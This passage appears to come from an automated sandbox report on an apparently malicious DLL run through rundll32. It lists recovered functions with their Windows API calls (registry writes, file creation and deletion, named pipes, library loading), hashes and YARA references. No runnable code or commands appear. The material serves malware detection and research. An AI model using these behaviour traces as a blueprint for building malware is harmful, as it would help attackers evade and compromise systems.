                              • Opcode ID: bfe721fb77403d1017da094d0befd1ef2c93580ded280bbc48479ba10bffaa2a
                              • Instruction ID: a61e44b299de4bd5ca3596b6a78602e2ff305acf182ecf6f436cfb237dce0f12
                              • Opcode Fuzzy Hash: bfe721fb77403d1017da094d0befd1ef2c93580ded280bbc48479ba10bffaa2a
                              • Instruction Fuzzy Hash: D131E032228704EBC7219E749C8A92FBFADFF89661B150619FA16E2141DF30AC158B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593161A Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0593163E
                                • Part of subcall function 0594447B: RegCloseKey.ADVAPI32(?,?), ref: 05944502
                              • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 0593166D
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 0593167E
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059316B8
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 059316DA
                              • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 059316E3
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 059316F9
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0593170E
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05931722
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05931737
                              • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 05931740
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                              • String ID:
                              • API String ID: 534682438-0
                              • Opcode ID: 8c84b2e5e96dccbb8c26c3ea5f208a0d79e4b552828c49341e7a268694a5de21
                              • Instruction ID: ae9d5b50af9647f2484809f100fcdab42167e0c981a5c9a260db455091caabe3
                              • Opcode Fuzzy Hash: 8c84b2e5e96dccbb8c26c3ea5f208a0d79e4b552828c49341e7a268694a5de21
                              • Instruction Fuzzy Hash: 41316B71514208FFDB119FA4DC8ADAEBFBEFF48341B184125F506E2020DB319A65EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059433CD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 059433E4
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094), ref: 059433F6
                              • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094), ref: 05943403
                              • wsprintfA.USER32 ref: 0594341E
                              • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0593C1F8,00000000,00000094,00000000), ref: 05943434
                              • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0594344D
                              • WriteFile.KERNEL32(00000000,00000000), ref: 05943455
                              • GetLastError.KERNEL32 ref: 05943463
                              • CloseHandle.KERNEL32(00000000), ref: 0594346C
                              • GetLastError.KERNEL32(?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094,00000000), ref: 0594347D
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094), ref: 0594348D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                              • String ID:
                              • API String ID: 3873609385-0
                              • Opcode ID: a29ae46f3fcddc6905d71e5afc0e4e8a71ec7041f010baeecdf02c841b52fd20
                              • Instruction ID: 636f594fc83533d7be415b50b5a8a5248b1e8e08ff34dde32563b56f3df547ec
                              • Opcode Fuzzy Hash: a29ae46f3fcddc6905d71e5afc0e4e8a71ec7041f010baeecdf02c841b52fd20
                              • Instruction Fuzzy Hash: 5011A271168314BFE2216A74EC8DEBFBF9CEB46765B010525F90AD2141DF500C69CBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05937FFF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 05938030
                              • StrChrA.SHLWAPI(00000001,0000002C), ref: 05938043
                              • StrTrimA.SHLWAPI(00000000,?), ref: 05938066
                              • StrTrimA.SHLWAPI(00000001,?), ref: 05938075
                              • lstrlen.KERNEL32(00000000), ref: 059380AA
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 059380BD
                              • lstrcpy.KERNEL32(00000004,00000000), ref: 059380DB
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 059380FF
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                              • String ID: W
                              • API String ID: 1974185407-655174618
                              • Opcode ID: 4dd2a57a7364f5de544eb59355b1921c987d97df888f691259651dbcfd28aad8
                              • Instruction ID: 0cc173e09020f1aef9f0c8f7e43b5b9879644cc32020e1176c8ecd62360d197c
                              • Opcode Fuzzy Hash: 4dd2a57a7364f5de544eb59355b1921c987d97df888f691259651dbcfd28aad8
                              • Instruction Fuzzy Hash: 9A31AD71919308FFDB209FA8CD4AE9ABFB9FF49340F044056F80997200EBB49950CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05943C97 Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(05F3CBB8,00000000,00000000,00000000,?), ref: 05943CBA
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05943CC9
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05943CD6
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 05943CEE
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05943CFA
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05943D16
                              • wsprintfA.USER32 ref: 05943DF8
                              • memcpy.NTDLL(00000000,00004000,?), ref: 05943E45
                              • InterlockedExchange.KERNEL32(0595A128,00000000), ref: 05943E63
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05943EA4
                                • Part of subcall function 0594E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594E3F6
                                • Part of subcall function 0594E3CD: memcpy.NTDLL(00000000,?,?), ref: 0594E409
                                • Part of subcall function 0594E3CD: RtlEnterCriticalSection.NTDLL(0595A428), ref: 0594E41A
                                • Part of subcall function 0594E3CD: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 0594E42F
                                • Part of subcall function 0594E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0594E467
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                              • String ID:
                              • API String ID: 4198405257-0
                              • Opcode ID: 8f6f823c9fd4463709f51fe4d5492260f586295027cfa14727c93e30d098bd2c
                              • Instruction ID: e23e1dbb717f6cc1f406b263a9a53835d578cfa71bfa0dfab1c3da41c17b345d
                              • Opcode Fuzzy Hash: 8f6f823c9fd4463709f51fe4d5492260f586295027cfa14727c93e30d098bd2c
                              • Instruction Fuzzy Hash: A4615C71A1420AEFCF11DFA5DC85EAE7BBAFB44305F148529F80697210DB34AA64CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05948CF3 Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05939100,?), ref: 05948D13
                              • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D1D
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D46
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D54
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D62
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D70
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D7E
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D8C
                              • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 05948DB6
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,05939100,?), ref: 05948E37
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load$Library$AllocDll@4FreeHeapImports
                              • String ID:
                              • API String ID: 1792504554-0
                              • Opcode ID: 80cae589f222c224148d2d735bef573dc9fd99a3737428897b1faf51c0014b1f
                              • Instruction ID: a41ffa54d4d1d5500843e77b0797f03348bd10c44ca598579ba374f722be293c
                              • Opcode Fuzzy Hash: 80cae589f222c224148d2d735bef573dc9fd99a3737428897b1faf51c0014b1f
                              • Instruction Fuzzy Hash: 3A41C071A14219EFCB00EFA8D989D9ABBFDFB08211F544566F509DB200DB38AD21CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E8BB Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05932F91: memset.NTDLL ref: 05932FB3
                                • Part of subcall function 05932F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0593305D
                              • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0594E903
                              • CloseHandle.KERNEL32(?), ref: 0594E90F
                              • PathFindFileNameW.SHLWAPI(?), ref: 0594E91F
                              • lstrlenW.KERNEL32(00000000), ref: 0594E928
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0594E939
                              • wcstombs.NTDLL ref: 0594E948
                              • lstrlen.KERNEL32(?), ref: 0594E955
                              • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 0594E994
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594E9A7
                              • DeleteFileW.KERNEL32(?), ref: 0594E9B4
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                              • String ID:
                              • API String ID: 2256351002-0
                              • Opcode ID: b94f7d809db19e5a123a00d41f1e4c9df28fcc4646a3027ee470e9dca041026e
                              • Instruction ID: 037e0525d813c87b4b9ef714dd54d7b4a2cc478b175df6b22acf35e6ef5092ba
                              • Opcode Fuzzy Hash: b94f7d809db19e5a123a00d41f1e4c9df28fcc4646a3027ee470e9dca041026e
                              • Instruction Fuzzy Hash: 0F314931614208EBDF21AFA5ED4AE9FBF7DFF85315F000025F906A2150DB319925DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594B9E9 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetTickCount.KERNEL32 ref: 0594B9F9
                              • CreateFileW.KERNEL32(05940971,80000000,00000003,0595A1E8,00000003,00000000,00000000,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA16
                              • GetLastError.KERNEL32(?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BABE
                                • Part of subcall function 0595087A: lstrlen.KERNEL32(?,00000000,0594BA3E,00000027,0595A1E8,?,00000000,?,?,0594BA3E,?,00000001,?,05940971,00000000,?), ref: 059508B0
                                • Part of subcall function 0595087A: lstrcpy.KERNEL32(00000000,00000000), ref: 059508D4
                                • Part of subcall function 0595087A: lstrcat.KERNEL32(00000000,00000000), ref: 059508DC
                              • GetFileSize.KERNEL32(05940971,00000000,?,00000001,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA49
                              • CreateFileMappingA.KERNEL32(05940971,0595A1E8,00000002,00000000,00000000,05940971), ref: 0594BA5D
                              • lstrlen.KERNEL32(05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA79
                              • lstrcpy.KERNEL32(?,05940971), ref: 0594BA89
                              • GetLastError.KERNEL32(?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA91
                              • HeapFree.KERNEL32(00000000,05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BAA4
                              • CloseHandle.KERNEL32(05940971,?,00000001,?,05940971), ref: 0594BAB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                              • String ID:
                              • API String ID: 194907169-0
                              • Opcode ID: b898f5a6e8b4d0593c9894ff9a43daba965b036e8a158b90c33527a3eac72e40
                              • Instruction ID: add4c8c5fc08b73f7661f5af363f24fd95e33d9ae3ad104c376d97b838fb1fbb
                              • Opcode Fuzzy Hash: b898f5a6e8b4d0593c9894ff9a43daba965b036e8a158b90c33527a3eac72e40
                              • Instruction Fuzzy Hash: 552106B1904308FFDB109FA4D889E9EBFB9FF04351F108469F90AA6251DB309E649F90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593DC41 Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(00000000,?,0594507B), ref: 0593DC56
                                • Part of subcall function 05945D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 05945D59
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0594507B), ref: 0593DC76
                              • CloseHandle.KERNEL32(00000000,?,0594507B), ref: 0593DC7F
                              • CloseHandle.KERNEL32(00000000,?,?,0594507B), ref: 0593DC89
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0593DC91
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0593DCA9
                              • Sleep.KERNEL32(000001F4), ref: 0593DCB8
                              • CloseHandle.KERNEL32(00000000), ref: 0593DCC5
                              • LocalFree.KERNEL32(?), ref: 0593DCD0
                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0593DCDA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                              • String ID:
                              • API String ID: 1408595562-0
                              • Opcode ID: fa15597b7c9ba529e66cee9fd3c4cc77964cab961399b4b1ece4ef87c3fa0f5e
                              • Instruction ID: f4ab33230cf6b86d1edd397a39d5f3f4a28b11e11e57339179c1e9205c5b0f4c
                              • Opcode Fuzzy Hash: fa15597b7c9ba529e66cee9fd3c4cc77964cab961399b4b1ece4ef87c3fa0f5e
                              • Instruction Fuzzy Hash: 1E119A71628716EFCB21AB75DD5AD5ABBFDBF007913024814F18682520DF75F850CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593DD7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05933DA2,00000000,00000001,?,?,?), ref: 0593DD92
                              • lstrlen.KERNEL32(?), ref: 0593DDA2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593DDD6
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0593DE01
                              • memcpy.NTDLL(00000000,?,?), ref: 0593DE20
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593DE81
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0593DEA3
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Allocatelstrlenmemcpy$Free
                              • String ID: W
                              • API String ID: 3204852930-655174618
                              • Opcode ID: c40fac72c85ca577ea55fa156ec7426262277a3e502efab72a6e6e7424cb76b8
                              • Instruction ID: d5610c6971d9a606191db4ed7f5e01925da0d8ca656c0c99eeb7cc7cb18d1c2e
                              • Opcode Fuzzy Hash: c40fac72c85ca577ea55fa156ec7426262277a3e502efab72a6e6e7424cb76b8
                              • Instruction Fuzzy Hash: 31414C7190430AEFCF11DFA4CC85AAEBFB9FF54284F144429E905A7211E730DA689BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593A107 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0593D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000), ref: 0593D435
                                • Part of subcall function 0593D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?), ref: 0593D493
                                • Part of subcall function 0593D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4A3
                              • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0593A153
                              • wsprintfA.USER32 ref: 0593A181
                              • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0593A1DF
                              • GetLastError.KERNEL32 ref: 0593A1F6
                              • ResetEvent.KERNEL32(?), ref: 0593A20A
                              • ResetEvent.KERNEL32(?), ref: 0593A20F
                              • GetLastError.KERNEL32 ref: 0593A227
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                              • String ID: `
                              • API String ID: 2276693960-1850852036
                              • Opcode ID: 0d90f16a070a6695db475f5e939ab830fa585735c2c68ff90b049e2aaec1f861
                              • Instruction ID: a27454da61cd6387d28bede35b36543df33bf7b2eb67e1a7e6a9ca4f2a200c1b
                              • Opcode Fuzzy Hash: 0d90f16a070a6695db475f5e939ab830fa585735c2c68ff90b049e2aaec1f861
                              • Instruction Fuzzy Hash: E1416C71500209EFDF11DFA5DD8AFAEBBB9FF44310F004425F846921A0DB31AA64CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05933172 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(059343C6,00000000,?,?,?,?,059343C6,00000035,00000000,?,00000000), ref: 059331A2
                              • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059331B8
                              • memcpy.NTDLL(00000010,059343C6,00000000,?,?,059343C6,00000035,00000000), ref: 059331EE
                              • memcpy.NTDLL(00000010,00000000,00000035,?,?,059343C6,00000035), ref: 05933209
                              • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05933227
                              • GetLastError.KERNEL32(?,?,059343C6,00000035), ref: 05933231
                              • HeapFree.KERNEL32(00000000,00000000,?,?,059343C6,00000035), ref: 05933254
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                              • String ID: (
                              • API String ID: 2237239663-3887548279
                              • Opcode ID: d0527d93e9e844844a68ec3d8c1eb147813a7453f98d71552165fac227bf3f5e
                              • Instruction ID: b2b208044bbeb755e93d032b9a44e3e70ff35ae2be6c44c106d82e384c5d5568
                              • Opcode Fuzzy Hash: d0527d93e9e844844a68ec3d8c1eb147813a7453f98d71552165fac227bf3f5e
                              • Instruction Fuzzy Hash: FC31B135914309EFDB21CFA5DD46AABBFB9FB44751F044825FD0AD2201E7309A64DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05947736 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL ref: 05947777
                              • memset.NTDLL ref: 0594778B
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • GetCurrentThreadId.KERNEL32 ref: 05947818
                              • GetCurrentThread.KERNEL32 ref: 0594782B
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 059478D2
                              • Sleep.KERNEL32(0000000A), ref: 059478DC
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05947902
                              • HeapFree.KERNEL32(00000000,?), ref: 05947930
                              • HeapFree.KERNEL32(00000000,00000018), ref: 05947943
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                              • String ID:
                              • API String ID: 1146182784-0
                              • Opcode ID: c9b96d081ebfdeef65dc5b7fbd387140e2386752d6053f30f97eca02354e6998
                              • Instruction ID: d6237b2291dfd1618383b00ded5d1e74e323e6ae94462a4dac63d3df7438815d
                              • Opcode Fuzzy Hash: c9b96d081ebfdeef65dc5b7fbd387140e2386752d6053f30f97eca02354e6998
                              • Instruction Fuzzy Hash: 6E5148B1618305AFE710EF64D985C2ABBE8FB88254F004D2DF585D7210DB30ED598F96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05942812 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059470C3: RtlEnterCriticalSection.NTDLL(0595A428), ref: 059470CB
                                • Part of subcall function 059470C3: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059470E0
                                • Part of subcall function 059470C3: InterlockedIncrement.KERNEL32(0000001C), ref: 059470F9
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0594284F
                              • memset.NTDLL ref: 05942860
                              • lstrcmpi.KERNEL32(?,?), ref: 059428A0
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 059428CC
                              • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05948974), ref: 059428E0
                              • memset.NTDLL ref: 059428ED
                              • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05942906
                              • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05942929
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05948974), ref: 05942946
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 694413484-0
                              • Opcode ID: c536b945f18687cefbb462bcf6a7d78cf0cf6ad08494e4747b786820e6263fd0
                              • Instruction ID: 296bcb54ceffa997813f00ccf9a10a536f64c328c0b27dd233f8541ba4ea016e
                              • Opcode Fuzzy Hash: c536b945f18687cefbb462bcf6a7d78cf0cf6ad08494e4747b786820e6263fd0
                              • Instruction Fuzzy Hash: 9A418B76A04209EFDF10CFA4CD85F9DBBB9FB48214F104129F909A7250EB35AE548F50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C9B5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594C9CC
                              • lstrlen.KERNEL32(?), ref: 0594C9D4
                              • lstrlen.KERNEL32(?), ref: 0594CA3F
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594CA6A
                              • memcpy.NTDLL(00000000,00000002,?), ref: 0594CA7B
                              • memcpy.NTDLL(00000000,?,?), ref: 0594CA91
                              • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0594CAA3
                              • memcpy.NTDLL(00000000,059553E8,00000002,00000000,?,?,00000000,?,?), ref: 0594CAB6
                              • memcpy.NTDLL(00000000,?,00000002), ref: 0594CACB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$lstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 3386453358-0
                              • Opcode ID: 129cd31ef00c9cf59455f528db51333482446d14600245ee32b95b968319274b
                              • Instruction ID: 3ebf4512a55246d40f998b5b7eac88217d450e818290d54bffbbfc933df30432
                              • Opcode Fuzzy Hash: 129cd31ef00c9cf59455f528db51333482446d14600245ee32b95b968319274b
                              • Instruction Fuzzy Hash: 8C413972D11209EFCF00CFA8CC85A9EBBB9FF48254F154456E909A3201E771EA60DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593605B Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059470C3: RtlEnterCriticalSection.NTDLL(0595A428), ref: 059470CB
                                • Part of subcall function 059470C3: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059470E0
                                • Part of subcall function 059470C3: InterlockedIncrement.KERNEL32(0000001C), ref: 059470F9
                              • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059360AC
                              • lstrlen.KERNEL32(00000008,?,?,?,0594F140,00000000,00000000,-00000008), ref: 059360BB
                              • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 059360CD
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,0594F140,00000000,00000000,-00000008), ref: 059360DD
                              • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0594F140,00000000,00000000,-00000008), ref: 059360EF
                              • lstrcpy.KERNEL32(00000020), ref: 05936121
